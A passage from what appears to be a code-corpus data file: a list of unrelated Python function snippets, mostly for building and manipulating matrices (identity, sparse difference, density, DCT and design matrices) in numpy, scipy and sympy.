in range(1, n - length + 1):\n j = i + length - 1\n for k in range(i, j):\n cost = m[i][k] + m[k + 1][j] + dimensions[i - 1] * dimensions[k] * dimensions[j]\n if cost > m[i][j]:\n m[i][j] = cost\n # index if splitting\n s[i][j] = k\n return m, s", "def find_linear_recurrence(self,n,d=None,gfvar=None):\n from sympy.simplify import simplify\n x = [simplify(expand(t)) for t in self[:n]]\n lx = len(x)\n if d is None:\n r = lx//2\n else:\n r = min(d,lx//2)\n coeffs = []\n for l in range(1, r+1):\n l2 = 2*l\n mlist = []\n for k in range(l):\n mlist.append(x[k:k+l])\n m = Matrix(mlist)\n if m.det() != 0:\n y = simplify(m.LUsolve(Matrix(x[l:l2])))\n if lx == l2:\n coeffs = flatten(y[::-1])\n break\n mlist = []\n for k in range(l,lx-l):\n mlist.append(x[k:k+l])\n m = Matrix(mlist)\n if m*y == Matrix(x[l2:]):\n coeffs = flatten(y[::-1])\n break\n if gfvar is None:\n return coeffs\n else:\n l = len(coeffs)\n if l == 0:\n return [], None\n else:\n n, d = x[l-1]*gfvar**(l-1), 1 - coeffs[l-1]*gfvar**l\n for i in range(l-1):\n n += x[i]*gfvar**i\n for j in range(l-i-1):\n n -= coeffs[i]*x[j]*gfvar**(i+j+1)\n d -= coeffs[i]*gfvar**(i+1)\n return coeffs, simplify(factor(n)/factor(d))", "def symbolic_max_plus_identity(d, nvar, ch=None):\n d = int(d)\n nvar = int(nvar)\n V = FreeModule(ZZ, nvar)\n e = ()\n zero = (V([0]*nvar),)\n\n data = [[zero if i == j else e for j in range(d)] for i in range(d)]\n return SymbolicMaxPlusMatrix(d, nvar, data, ch)", "def _identity_dense(d, dtype=complex):\n return np.eye(d, dtype=dtype)", "def solve(n=10):\n return sum(M_N_S(n, d)[2] for d in range(10))", "def _relax_matrix(self, n=1):\n\n for i in range(n):\n self.level.mid.reshape(-1)[:] = self.R_w.dot(self.level.mid.reshape(-1)) \\\n + self.omega * self.level.rhs / self.D", "def diag_indices(n, ndim=2):\n\n if not use_origin_backend():\n return dpnp_diag_indices(n, ndim)\n\n return call_origin(numpy.diag_indices, n, ndim)", "def expansion_matrix_d(self):\n row = self._base_nlp._d_map\n nnz = len(self._base_nlp._d_map)\n col = np.arange(nnz, dtype=np.int)\n data = np.ones(nnz)\n return csr_matrix((data, (row, col)), shape=(self.ng, nnz))", "def random_planted_matrix(d, n, replace='True'):\n all_idx = np.asarray(list(zip(*np.tril_indices(d,-1))))\n chosen_idx_positions = np.random.choice(len(all_idx), size=n, replace=replace)\n subspaces = all_idx[chosen_idx_positions]\n angles = 2*np.pi * (np.random.rand(len(subspaces)) - 0.5)\n U = np.eye(d)\n for s, alpha in zip(subspaces, angles):\n U = right_givens(math.cos(alpha), math.sin(alpha), U, s[0], 
s[1])\n return U", "def construct_M_N(n):\n n2 = n**2\n D0 = 2*np.ones(n2) # 0th diagonal\n D1 = - np.ones(n2 - 1) # -1st, 1st diagonals\n D1[n-1::n] = 0 # Setting every k*n-1 entries = 0 for k < n\n DN = - np.ones(n2 - n) # -nth, nth diagonals\n return (scipy.sparse.diags((D1, D0, D1), (-1, 0, 1), shape=(n2, n2), format=\"csr\"),\n scipy.sparse.diags((DN, D0, DN), (-n, 0, n), shape=(n2, n2), format=\"csr\"))", "def diag_indices(n, ndim=2):\r\n idx = np.arange(n)\r\n return (idx,) * ndim", "def dens_matrix(state):\n size = len(state)\n state_conj = np.conj(state)\n dm = np.zeros((size,) * 4, dtype=complex)\n\n for p1 in range(size):\n for p2 in range(size):\n for p1_ in range(size):\n for p2_ in range(size):\n dm[p1, p2, p1_, p2_] = state[p1, p2] * state_conj[p1_, p2_]\n\n return dm", "def Dinvmatrix(N):\r\n import numpy as np\r\n D = np.zeros((N,N,2))\r\n D[:,:,0] = np.diag((np.append(np.ones((1,int(N/2))),np.zeros((1,int(N/2))))))\r\n D[:,:,1] = np.diag((np.append(np.zeros((1,int(N/2))),np.ones((1,int(N/2))))))\r\n return D", "def symmetrize(n):\n times = lambda x: jnp.concatenate((jnp.flipud(x), x))\n trans = lambda x: x[n:] + x[n-1::-1]\n return Operator(times=times, trans=trans, shape=(2*n,n))", "def get_matrixS(n):\n\n mat_nxn = np.zeros([n, n], dtype=int)\n for row_num in range(1, n + 1):\n i = row_num - 1\n if row_num == 1:\n mat_nxn[i][i + 1] = 1\n mat_nxn[i][i + 2] = 1\n elif row_num == 2:\n mat_nxn[i][i - 1] = 1\n mat_nxn[i][i + 2] = 1\n elif row_num == n - 1:\n mat_nxn[i][i + 1] = 1\n mat_nxn[i][i - 2] = 1\n elif row_num == n:\n mat_nxn[i][i - 1] = 1\n mat_nxn[i][i - 2] = 1\n elif row_num % 2 == 1:\n mat_nxn[i][i + 1] = 1\n mat_nxn[i][i + 2] = 1\n mat_nxn[i][i - 2] = 1\n elif row_num % 2 == 0:\n mat_nxn[i][i - 1] = 1\n mat_nxn[i][i + 2] = 1\n mat_nxn[i][i - 2] = 1\n mat_nxn = mat_nxn + np.eye(n, dtype=int)\n mat_2nx2n = np.repeat(np.repeat(mat_nxn, 2, 0), 2, 1)\n return torch.as_tensor(mat_2nx2n)", "def dirac(self,n):\r\n y = np.zeros(len(n),dtype = complex)\r\n y[n==0] = 1\r\n return y", "def all_basis_vectors(n: int) -> list:\n assert n >= 0, \"n must be > 0\"\n basis_1dim = ['0', '1']\n\n if n == 0:\n return []\n if n == 1:\n return basis_1dim\n else:\n current_basis = basis_1dim\n for i in range(1, n):\n # can be made more efficient (e.g. 
by current_basis, current basis until we reach sqrt(n))\n current_basis = outer_subspace_product(basis_1dim, current_basis)\n\n return current_basis", "def _compute_ind_mat(n, m, nb_coeff):\r\n\r\n ind_mat = np.zeros((nb_coeff, n))\r\n curr_idx = 0\r\n for indexes in itr.combinations_with_replacement(range(m), n):\r\n ind_mat[curr_idx] = np.array(indexes)\r\n curr_idx += 1\r\n\r\n return ind_mat", "def matrix_N1(l, omega, S, cn):\n sqrt = np.sqrt(l * (l + 1))\n zl = omega * S / cn['l']\n zt = omega * S / cn['t']\n col1 = - np.array((dN1(l, zt), dN2(l, zt), dN3(l, zt), dN4(l, zt))) / zt\n col2 = (sqrt * np.array((dL1(l, zt), dL2(l, zl),\n dL3(l, zl), dL4(l, zt, zl))) / zl\n )\n N = np.array((col1, col2))\n return N.T", "def novelty(self, d, x):\n # measure the data and check if the dimmension agree\n N = len(x)\n if not len(d) == N:\n raise ValueError('The length of vector d and matrix x must agree.')\n self.n = len(x[0])\n # prepare data\n try:\n x = np.array(x)\n d = np.array(d)\n except:\n raise ValueError('Impossible to convert x or d to a numpy array')\n # create empty arrays\n y = np.zeros(N)\n e = np.zeros(N)\n nd = np.zeros((N,self.n))\n self.w_history = np.zeros((N,self.n))\n # adaptation loop\n for k in range(N):\n self.update_memory_x(x[k])\n m_d, m_x = self.read_memory()\n # estimate\n y[k] = np.dot(self.w, x[k]-m_x) + m_d\n e[k] = d[k] - y[k]\n nu = self.mu / (self.eps + np.dot(x[k]-m_x, x[k]-m_x))\n dw = nu * e[k] * (x[k]-m_x)\n self.w += dw\n self.w_history[k,:] = self.w\n nd[k,:] = dw * e[k]\n self.update_memory_d(d[k])\n return y, e, self.w_history, nd", "def all_matrices(n):\n complete = int(n * (n-1) / 2)\n least = (n-1)*2 - 1 # the number of edges is at least 2(n-1)-1\n all_possible_list = [i for i in itertools.product([0, 1], repeat=complete)\n if sum(i) >= least]\n all_mats = [create_matrix(i, n) for i in all_possible_list]\n return all_mats", "def get_dct_matrix(N):\r\n dct_m = np.eye(N)\r\n for k in np.arange(N):\r\n for i in np.arange(N):\r\n w = np.sqrt(2 / N)\r\n if k == 0:\r\n w = np.sqrt(1 / N)\r\n dct_m[k, i] = w * np.cos(np.pi * (i + 1 / 2) * k / N)\r\n idct_m = np.linalg.inv(dct_m)\r\n return dct_m, idct_m", "def identity_matrix(n):\n data = [[1 if c == r else 0 for c in range(n)] for r in range(n)]\n return Matrix(data)", "def _dmatrix(kn_u, kn_d):\n d = np.zeros((kn_u.size, 4, 4), np.complex128)\n d_inv = np.zeros_like(d)\n\n d[:, 0, 0] = 1\n d[:, 0, 1] = 1\n d[:, 1, 0] = kn_u\n d[:, 1, 1] = -kn_u\n\n d[:, 2, 2] = 1\n d[:, 2, 3] = 1\n d[:, 3, 2] = kn_d\n d[:, 3, 3] = -kn_d\n\n # an analytic matrix inverse saves time\n inv_kn_u = 0.5 / kn_u\n inv_kn_d = 0.5 / kn_d\n\n d_inv[:, 0, 0] = 0.5\n d_inv[:, 0, 1] = inv_kn_u\n d_inv[:, 1, 0] = 0.5\n d_inv[:, 1, 1] = -inv_kn_u\n\n d_inv[:, 2, 2] = 0.5\n d_inv[:, 2, 3] = inv_kn_d\n d_inv[:, 3, 2] = 0.5\n d_inv[:, 3, 3] = -inv_kn_d\n\n return d, d_inv", "def decomposition_into_s_n_irreducibles(self, n):\r\n w5 = partitions_list(n)\r\n M5 = form_matrix_yt(w5)\r\n card = math.factorial(n)\r\n vec_dic = {}\r\n for k in range(self.dimension()+1):\r\n D = {}\r\n uu = []\r\n vv = []\r\n p = k \r\n A = self.matrix_simmetric_representate(p)\r\n if (p >0 and (p <= self.dimension())):\r\n null = nullspace(A)\r\n w3 = []\r\n for i in range(len(null[0])):\r\n w = []\r\n for j in range(len(null)):\r\n w.append(null[j][i])\r\n w3.append(w) \r\n null = w3\r\n M = np.matrix(w3, dtype= np.float64).transpose()\r\n Mi = np.linalg.pinv(M)\r\n else:\r\n if (p == 0):\r\n M = A\r\n null = []\r\n for i in range(A.shape[0]):\r\n aux = []\r\n 
for j in range(A.shape[1]):\r\n aux.append(M[i,j])\r\n null.append(aux)\r\n M = np.matrix(null, dtype=np.float64)\r\n Mi = M\r\n p = k + 1\r\n if (p>0 and (p <= self.dimension())):\r\n A1=self.matrix_simmetric_representate(p)\r\n col = columnspace(A1)\r\n w4 = []\r\n for i in range(len(col[0])):\r\n w = []\r\n for j in range(len(col)):\r\n w.append(col[j][i])\r\n w4.append(w)\r\n col = w4\r\n M1 = np.matrix(w4, dtype=np.float64).transpose()\r\n Mii = np.linalg.pinv(M1)\r\n for h in w5:\r\n p = k \r\n if (p >0 and (p <= self.dimension())):\r\n if (all(elem == 0 for elem in null[0])):\r\n l1 = 0\r\n else:\r\n he = self.basis_group_oriented_p_chains(p) \r\n on1 = np.ones(len(list(he.dic.keys())), dtype=np.float64) \r\n v = P_chains([],[])\r\n v = P_chains(list(he.dic.keys()),on1)\r\n v1 = permutation_in_simplex_test(v, make_permutation(h))\r\n D1={}\r\n c1 = 0\r\n for i in list(v1.dic.keys()):\r\n c2 = 1\r\n for j in list(he.dic.keys()):\r\n if (i == j):\r\n if (v1.dic[i] == he.dic[j]):\r\n D1[c1] = c2\r\n else:\r\n D1[c1] = -c2\r\n c2 = c2 + 1\r\n c1 = c1 + 1\r\n rr = M.shape[0]\r\n cc = M.shape[1]\r\n Ma = np.zeros([rr,cc],dtype=np.float64)\r\n for i in range(rr):\r\n Ma[i,:] = (M[(abs(D1[i])-1),:]*(np.sign(D1[i])))\r\n l1 = 0\r\n for j in range(cc):\r\n l1 = np.dot(Mi[j,:],Ma[:,j])[0,0] + l1\r\n else:\r\n if (p == 0):\r\n he = self.basis_group_oriented_p_chains(p) \r\n on1 = np.ones(len(list(he.dic.keys())), dtype=np.float64) \r\n v = P_chains([],[])\r\n v = P_chains(list(he.dic.keys()),on1)\r\n v1 = permutation_in_simplex_test(v, make_permutation(h))\r\n D1={}\r\n c1 = 0\r\n for i in list(v1.dic.keys()):\r\n c2 = 1\r\n for j in list(he.dic.keys()):\r\n if (i == j):\r\n if (v1.dic[i] == he.dic[j]):\r\n D1[c1] = c2\r\n else:\r\n D1[c1] = -c2\r\n c2 = c2 + 1\r\n c1 = c1 + 1\r\n rr = M.shape[0]\r\n cc = M.shape[1]\r\n Ma = np.zeros([rr,cc],dtype=np.float64)\r\n for i in range(rr):\r\n Ma[i,:] = (M[(abs(D1[i])-1),:]*(np.sign(D1[i])))\r\n l1 = 0\r\n for j in range(cc):\r\n l1 = np.dot(Mi[j,:],Ma[:,j])[0,0] + l1\r\n else:\r\n l1 = 0\r\n p = k + 1\r\n if (p>0 and (p <= self.dimension())):\r\n hi = self.basis_group_oriented_p_chains(p-1) \r\n on1i = np.ones(len(list(hi.dic.keys())), dtype=np.float64) \r\n vi = P_chains([],[])\r\n vi = P_chains(list(hi.dic.keys()),on1i)\r\n v1i = permutation_in_simplex_test(vi, make_permutation(h))\r\n D1i={}\r\n c1 = 0\r\n for i in list(v1i.dic.keys()):\r\n c2 = 1\r\n for j in list(hi.dic.keys()):\r\n if (i == j):\r\n if (v1i.dic[i] == hi.dic[j]):\r\n D1i[c1] = c2\r\n else:\r\n D1i[c1] = -c2\r\n c2 = c2 + 1\r\n c1 = c1 + 1\r\n rr = M1.shape[0]\r\n cc = M1.shape[1]\r\n Mai = np.zeros([rr,cc],dtype=np.float64)\r\n for i in range(rr):\r\n Mai[i,:] = (M1[(abs(D1i[i])-1),:]*(np.sign(D1i[i])))\r\n l2 = 0\r\n for j in range(cc):\r\n l2 = np.dot(Mii[j,:],Mai[:,j])[0,0] + l2\r\n else:\r\n l2 = 0\r\n uu.append(l1-l2) \r\n vv.append(size_conjugacy_class(h,n))\r\n for i in range(M5.shape[0]):\r\n Ip = 0\r\n for j in range(M5.shape[1]):\r\n Ip = Ip + M5[i,j]*uu[j]*vv[j]\r\n Ip = Ip/card\r\n D[tuple(w5[i])] = abs(round(Ip))\r\n '''Note that I am using round, only because the results obtained are \r\n not esthetics'''\r\n vec_dic[k] = D\r\n return vec_dic", "def I(n):\n identity = Matrix(n,n)\n print identity.matrix\n index = 0 \n for i in range(identity.nrows):\n for j in range(identity.ncols):\n identity.matrix[i][index] = 1\n index += 1\n\n\n flat = []\n for i in range(identity.nrows):\n for j in range(identity.ncols):\n flat.append(identity.matrix[i][j])\n\n\n return 
identity", "def expansion_matrix_dl(self):\n\n row = self._base_nlp._lower_d_map\n nnz = len(self._base_nlp._lower_d_map)\n col = np.arange(nnz, dtype=np.int)\n data = np.ones(nnz)\n return csr_matrix((data, (row, col)), shape=(self.nd, nnz))", "def modalDiffMatrix(n):\n k = np.arange(n)\n a = (-1)**k\n A = sp.triu(1-np.outer(a,a))\n D = np.dot(A,np.diag(k))\n D[0,:] = D[0,:]/2\n return D", "def D2mat(numpts, delta=1, periodic=True, q=0):\n\n a = 1. / delta ** 2 * ones(numpts)\n b = -2. / delta ** 2 * ones(numpts)\n c = 1. / delta ** 2 * ones(numpts)\n #print \"delta = %f\" % (delta)\n if periodic:\n if q == 0:\n return sparse.spdiags([c, a, b, c, c], [-numpts + 1, -1, 0, 1, numpts - 1], numpts, numpts)\n else:\n return sparse.spdiags([exp(-(0. + 1.j) * q) * c, a, b, c, exp((0. + 1.j) * q) * c],\n [-numpts + 1, -1, 0, 1, numpts - 1], numpts, numpts)\n else:\n return sparse.spdiags([a, b, c], [-1, 0, 1], numpts, numpts)", "def Problem2(n):\n diag_entries = np.empty((3,n))\n diag_entries[0] = np.ones(n)*(-1)\n diag_entries[1] = np.ones(n)*2\n diag_entries[2] = np.ones(n)*(-1)\n A = sparse.spdiags(diag_entries, [-1,0,1],n,n,format=\"csr\")\n return A", "def create_matrix(n, m):\n matrix = [[None]*m for i in range(n)]\n return matrix", "def generate_basis(n, dim):\n planes = [np.random.randn(dim) for i in range(n)]\n return [p / np.linalg.norm(p) for p in planes]", "def gen_M_1d(k=None, n=None, sparse=True):\n if n is None:\n print(\"specify `n` in gen_M_1d\")\n sys.exit(0)\n\n if k is None:\n print(\"specify `k` in gen_M_1d\")\n sys.exit(0)\n\n ## find split1 and split 2 indices\n s1 = (n-k)/2\n s2 = n-(s1+k)\n\n ## build diagonal\n if sparse:\n data = np.ones(n)\n offsets = s1\n M = sps.dia_matrix((data,offsets), shape=(k,n))\n else:\n d = np.concatenate([np.zeros(s1), np.ones(k), np.zeros(s2)])\n M = np.diag(d)\n M = M[s1:(s1+k),:]\n return M", "def decomposition_into_s_n_irreducibles_chain_sp(self, n):\r\n w5 = partitions_list(n)\r\n M5 = form_matrix_yt(w5)\r\n card = math.factorial(n)\r\n vec_dic = {}\r\n for k in range(self.dimension()+1):\r\n D = {}\r\n uu = []\r\n vv = []\r\n he = self.basis_group_oriented_p_chains(k) \r\n for h in w5:\r\n v1 = P_chains([],[])\r\n v1 = permutation_in_simplex_test(he, make_permutation(h))\r\n rr = len(list(he.dic.keys()))\r\n Ma = np.zeros([rr,rr],dtype=np.float64)\r\n c1 = 0\r\n for i in list(he.dic.keys()):\r\n c2 = 0\r\n for j in list(v1.dic.keys()):\r\n if (i == j):\r\n Ma[c1,c2] = v1.dic[i]\r\n c2 = c2 + 1\r\n c1 = c1 + 1\r\n Ma = np.matrix(Ma, dtype='float64')\r\n uu.append(np.trace(Ma)) \r\n vv.append(size_conjugacy_class(h,n))\r\n for i in range(M5.shape[0]):\r\n Ip = 0\r\n for j in range(M5.shape[1]):\r\n Ip = Ip + M5[i,j]*uu[j]*vv[j]\r\n Ip = Ip/card\r\n D[tuple(w5[i])]=Ip\r\n vec_dic[k] = D\r\n return vec_dic", "def construct_matrix_A(n):\n n2 = n**2\n D0 = 4*np.ones(n2) # 0th diagonal\n D1 = - np.ones(n2 - 1) # -1st, 1st diagonals\n D1[n-1::n] = 0 # Setting every k*n-1 entries = 0 for k < n\n DN = - np.ones(n2 - n) # -nth, nth diagonals\n return scipy.sparse.diags((DN, D1, D0, D1, DN), (-n, -1, 0, 1, n),\n shape=(n2, n2), format=\"csr\")", "def get_feature_matrix(N, Xtrain, D):\n for i in range(D+1):\n if i == 0:\n X = [1] * N\n else:\n X = np.vstack([np.power(Xtrain, i), X])\n X = X.transpose()\n return X", "def magma_dnrm2(n, dx, incx, queue):\n\n return _libmagma.magma_dnrm2(n, int(dx), incx, queue)", "def __init__(self, n):\r\n self.size = n\r\n self.mat = []\r\n for i in range(n):\r\n self.mat.append([0] * n)", "def 
calc_einsum_idx(bits, n):\n assert len(bits) + n <= len(SYMBOLS)\n\n tens_in = SYMBOLS[:n]\n tens_out = list(tens_in)\n mat_left = ''\n mat_right = ''\n\n for pos, idx in enumerate(reversed(bits)):\n mat_left += SYMBOLS[-1 - pos]\n mat_right += tens_in[-1 - idx]\n tens_out[-1 - idx] = SYMBOLS[-1 - pos]\n tens_out = ''.join(tens_out)\n\n return mat_left + mat_right + ',' + tens_in + '->' + tens_out", "def identity_matrix(self, n):\r\n IdM = self.zeros_matrix(n, n)\r\n for i in range(n):\r\n IdM[i][i] = 1.0\r\n \r\n return IdM", "def coordinate_matrix(n):\n xcoordinates = np.zeros((n,n))\n xcoordinates = xcoordinates + np.arange(0,worksize) #broadcasting trick\n ycoordinates = xcoordinates.T\n return np.array([ycoordinates,xcoordinates])", "def d(n,m):\r\n integrand = lambda r: r**3*R(n,0,r)*R(m,1,r)\r\n integral = integrate.quad(integrand, 0, np.inf)\r\n\r\n return e*a0*integral[0]/np.sqrt(3)", "def get_nd_basis(n=5):\n assert n >= 0\n t = np.linspace(0, np.pi, n + 1)[:-1]\n xs = np.cos(t)\n ys = np.sin(t)\n return [(x, y) for x, y in zip(xs, ys)]", "def n_simplex(self, dim_n=3, project = True):\n verts = permutations([0 for i in range(dim_n)] + [1])\n if project: verts = [Polytopes.project_1(x) for x in verts]\n return Polyhedron(vertices = verts)", "def get_multivariate_matrix(x_data, D):\n rows = []\n terms = get_polynomial(['x1', 'x2', 'x3', 'x4', 'x5'], D)\n for row in range(len(x_data)):\n row_data = {}\n row_data['x1'] = x_data[row, 0]\n row_data['x2'] = x_data[row, 1]\n row_data['x3'] = x_data[row, 2]\n row_data['x4'] = x_data[row, 3]\n row_data['x5'] = x_data[row, 4]\n \n row_entry = []\n for t in terms:\n prod = 1\n for var in t:\n prod *= row_data[var]\n row_entry.append(prod)\n \n row_entry = np.array(row_entry) \n rows.append(row_entry)\n return np.vstack(rows)", "def drum_like_env(N, sr):\n ## TODO: Fill this in\n return np.zeros(N)", "def d_weights(n):\n i = np.arange(1, n)\n return np.sqrt(n / (i * (n - i)))", "def eye(cls, n, domain):\n # XXX: flint matrices do not have anything like eye\n return DDM.eye(n, domain).to_dfm()", "def basis_fns(n=0):\n return lambda x: np.sum(x ** (n+1), axis=1)", "def dens_matrix_4ch(state):\n size = len(state)\n state_conj = np.conj(state)\n dens_matrix = np.zeros((size,) * 8, dtype=complex)\n\n for p1 in range(size):\n for p2 in range(size):\n for p3 in range(size):\n for p4 in range(size):\n for p1_ in range(size):\n for p2_ in range(size):\n for p3_ in range(size):\n for p4_ in range(size):\n dens_matrix[p1, p2, p3, p4, p1_, p2_, p3_, p4_] = state[p1, p2, p3, p4] * state_conj[p1_, p2_, p3_, p4_]\n\n return dens_matrix", "def identity(n):\r\n I = np.zeros((n, n))\r\n diag = np.ones(n)\r\n np.fill_diagonal(I, diag)\r\n return matrix(I)", "def identMatrix(size):\n returnvalue = Matrix()\n for i in range(size):\n newrow = [0] * size\n newrow[i] = 1\n returnvalue.addRow(*newrow)\n return returnvalue", "def gen_density_matrix(states=None, dimensions=None):\n if states is None:\n tdim = np.prod(dimensions)\n dmtotal0 = np.eye(tdim) / tdim\n\n return dmtotal0\n\n dmtotal0 = np.eye(1, dtype=np.complex128)\n\n for i, s in enumerate(states):\n\n if not hasattr(s, \"__len__\"):\n # assume s is int or float showing the spin projection in the pure state\n d = dimensions[i]\n dm_nucleus = np.zeros((d, d), dtype=np.complex128)\n state_number = int(round((d - 1) / 2 - s))\n dm_nucleus[state_number, state_number] = 1\n\n else:\n if s.shape.__len__() == 1:\n d = dimensions[i]\n dm_nucleus = np.zeros((d, d), dtype=np.complex128)\n np.fill_diagonal(dm_nucleus, 
s)\n\n else:\n dm_nucleus = s\n\n dmtotal0 = np.kron(dmtotal0, dm_nucleus)\n\n return dmtotal0", "def direct_obs_matrix(Nx,obs_inds):\n Ny = len(obs_inds)\n H = zeros((Ny,Nx))\n H[range(Ny),obs_inds] = 1\n return H", "def generate(self, n, d):\n\n self.n = n\n self.d = d\n self.X = np.random.rand(n, d)\n self.Y = np.random.choice([0, 1], size=n)", "def dctmtx(n):\n x,y = np.meshgrid(range(n), range(n))\n D = np.sqrt(2.0/n) * np.cos(np.pi * (2*x+1) * y / (2*n))\n D[0] /= np.sqrt(2)\n return D", "def _fd_matrix(step_ratio, parity, nterms):\n _assert(0 <= parity <= 6,\n 'Parity must be 0, 1, 2, 3, 4, 5 or 6! ({0:d})'.format(parity))\n step = [1, 2, 2, 4, 4, 4, 4][parity]\n inv_sr = 1.0 / step_ratio\n offset = [1, 1, 2, 2, 4, 1, 3][parity]\n c0 = [1.0, 1.0, 1.0, 2.0, 24.0, 1.0, 6.0][parity]\n c = c0 / \\\n special.factorial(np.arange(offset, step * nterms + offset, step))\n [i, j] = np.ogrid[0:nterms, 0:nterms]\n return np.atleast_2d(c[j] * inv_sr ** (i * (step * j + offset)))", "def reflect(d,n):\n\t# coefficent c, because easier\n\tc = 2 * dot(d,n)\n\treturn [di - c * ni for (di, ni) in zip(d,n)]", "def exo4_q1(mu,n,x0,y0):\r\n #liste.append([x0,y0])\r\n absc = x0\r\n ordn = y0\r\n L = np.array([absc])\r\n M = np.array([ordn])\r\n for i in range(0,n):\r\n absc = exo2_1(absc,mu)\r\n ordn = exo2_1(ordn,mu)\r\n L = np.append(L,[absc])\r\n M = np.append(M,[ordn])\r\n return L,M", "def from_list_sympy(cls, nrows, ncols, rows, **kwargs):\n assert len(rows) == nrows\n assert all(len(row) == ncols for row in rows)\n\n items_sympy = [_sympify(item) for row in rows for item in row]\n\n domain, items_domain = cls.get_domain(items_sympy, **kwargs)\n\n domain_rows = [[items_domain[ncols*r + c] for c in range(ncols)] for r in range(nrows)]\n\n return DomainMatrix(domain_rows, (nrows, ncols), domain)", "def xyMatrixTransformMSD(d, m):\n functionSpace = np.zeros((d,d))\n for x in range(d):\n for y in range(d): \n xy = np.transpose([x, y])\n _xy = np.dot(m, xy)\n functionSpace[x, y] = int(str(_xy[0]*_xy[0]+_xy[1]*_xy[1])[0])\n \n return functionSpace", "def laplacian_mat(n):\n data = [1, -2, 1]*n\n i = flatten([[k,k,k] for k in range(n)])\n j = flatten([[k-1, k, k+1] for k in range(n)])\n return scipy.sparse.coo_matrix((data[1:-1], (i[1:-1], j[1:-1])))", "def generate_positive_semi_definite_matrix(n_dim):\n cov = np.random.randn(n_dim, n_dim)\n return np.dot(cov, cov.T)", "def mesh_uniform(N_e, d, Omega):", "def create_dims(self, n_vec, m_vec):\n dims_mat = np.array([], dtype=np.int64).reshape(2, 0)\n for n in n_vec:\n for m in m_vec[m_vec > n]:\n dims_mat = np.hstack((dims_mat,\n np.array([[n], [m]])))\n return dims_mat", "def LDL(A, d):\n n = shape(A)[0]\n L = array(eye(n))\n dg = zeros(n)\n dg[0] = A[0, 0]\n for k in range(1, n):\n m = reshape(array(A[:k, k].copy()), k)\n rforwardsolve(L[:k, :k], m, d)\n L[k, :k] = m/dg[:k]\n dg[k] = A[k, k] - dot(L[k, :k], m)\n return L, dg", "def get_omega_0(n_bits: int, as_numeric: bool = False) -> Matrix:\n q = qe.get_bit_map(len(DEPENDENTS), n_bits)\n mat = -q.T @ q + 4 * np.diag(np.sum(q, axis=0))\n return np.array(mat) if as_numeric else mat", "def ddL(n):\n\n\tif (n==0):\n\t\treturn lambda x: 0.0\n\n\telif (n==1):\n\t\treturn lambda x: 0.0\n\n\telse:\n\n\t\t# approximate by fitting polynomial and taking derivatives\n\t\tc_om1 = coef_approximation(L(n), n)\n\t\tc_prime = polynomial_derivative(c_om1)\n\t\tc_double_prime = polynomial_derivative(c_prime)\n\n\t\t# [TODO]: fix own method from Hw 3\n\t\treturn lambda x: np.polyval(c_double_prime, x)", "def matrix_L1(l, 
omega, S, cn):\n zt = omega * S / cn['t']\n L = np.array((dN2(l, zt), dN4(l, zt)))\n return L.T", "def matrix_N2(l, omega, S, cn):\n sqrt = np.sqrt(l * (l + 1))\n zl = omega * S / cn['l']\n zt = omega * S / cn['t']\n col1 = - np.array((wN1(l, zt), wN2(l, zt), wN3(l, zt), wN4(l, zt))) / zt\n col2 = (sqrt * np.array((wL1(l, zt), wL2(l, zl),\n wL3(l, zl), wL4(l, zl, zt))) / zl\n )\n N = np.array((col1, col2))\n return N.T", "def identity_matrix(n: int) -> Matrix:\n return make_matrix(n, n, lambda i, j: 1 if i == j else 0)", "def identity_matrix(n: int) -> Matrix:\n return make_matrix(n, n, lambda i, j: 1 if i == j else 0)", "def identity_matrix(n: int) -> Matrix:\n return make_matrix(n, n, lambda i, j: 1 if i == j else 0)", "def _lambda(m, d, Q):\n\n d_2 = int(d / 2)\n def y_i_j(i, j):\n poly = list(np.zeros((d + 1, 1)))\n for k in range(d_2 + 1):\n for l in range(d_2 + 1):\n poly[k + l] += Q[i + k * m, j + l * m]\n return poly\n\n mat_y = [[y_i_j(i, j) for j in range(m)] for i in range(m)]\n mat_y = np.array(mat_y)\n return mat_y", "def CreateDesignMatrix_X(z, x, y, n ):\n if len(x.shape) > 1:\n x = np.ravel(x)\n y = np.ravel(y)\n\n N = len(x)\n l = int((n+1)*(n+2)/2) \n X = np.ones((N,l))\n\n for i in range(1,n+1):\n q = int((i)*(i+1)/2)\n for k in range(i+1):\n X[:,q+k] = x**(i-k) * y**k\n \n X, z_, indicies = shuffle(X, z)\n X_train, X_test, z_train, z_test = train_test_split(X, z_, test_size=split_train_test, random_state=seed, shuffle=False)\n X_test, X_val, z_test, z_val = train_test_split(X_test, z_test, test_size=split_test_val, random_state=seed, shuffle=False)\n\n return X, X_train, X_test, X_val, z_train, z_test, z_val, indicies", "def recomb_matrix(recomb_coefficients, atomic_number, ion_number):\n offdiag = np.zeros(atomic_number)\n index = recomb_coefficients.index\n for i in index:\n offdiag[i] = recomb_coefficients.loc[i]\n diag = np.hstack([np.zeros(1), -offdiag])\n return (np.diag(diag) + np.diag(offdiag, k=1))[ion_number, :]", "def generate_random_matrix(n):\n return [[random.randint(1, 50) for i in range(n)] for j in range(n)]", "def xn_xn_prod(self,x_n):\n \n x_n_tiled =T.tile(x_n,(self.num_vars,1))\n \n return T.transpose(x_n_tiled)*x_n_tiled", "def eye(n,M=None, k=0, dtype=float):\n return asmatrix(np.eye(n,M,k,dtype))", "def identity_matrix(n):\n I = zeros_matrix(n, n)\n for i in range(n):\n I[i][i] = 1.0\n\n return I", "def identity_matrix(n):\n I = zeros_matrix(n, n)\n for i in range(n):\n I[i][i] = 1.0\n\n return I", "def designMatrix(self,x,m):\n\n phi = []\n\n for i in x:\n matric = []\n for j in range(0, m + 1):\n matric.append(np.power(i,j))\n phi.append(matric)\n return np.asarray(phi)", "def generate_model (d):\n return np.random.rand (d+1, 1)", "def complex_matrix(n):\n\n matrix = np.zeros(shape=(n, n), dtype=complex)\n\n for row in np.arange(n):\n if row == 0:\n for col in np.arange(n):\n matrix[row, col] = 1\n else:\n for col in np.arange(n):\n if col == 0:\n matrix[row, col] = 1\n else:\n matrix[row, col] = roots(n, col*row)\n\n return matrix", "def get_extremist_network(Nx, Dx):\n N = np.zeros([Nx, Nx], dtype=int)\n\n for i in range(0, Nx): # Iterate over the upper diagonal only\n for j in range(i+1, Nx):\n r = rg.random() # r is in [0.0, 1.0)\n if r <= Dx:\n N[i][j] = 1\n N[j][i] = 1\n return N", "def bandcholesky(A, d):\n L, dg = LDL(A, d)\n return matrix(L)*diag(sqrt(dg))", "def create_array( n ):", "def build_difs_matrix(xs):\n n = len(xs)\n difs = np.zeros((n, n, 2))\n for row_id in range(n):\n ident = -np.eye(n)\n ident[:, row_id] += 1\n 
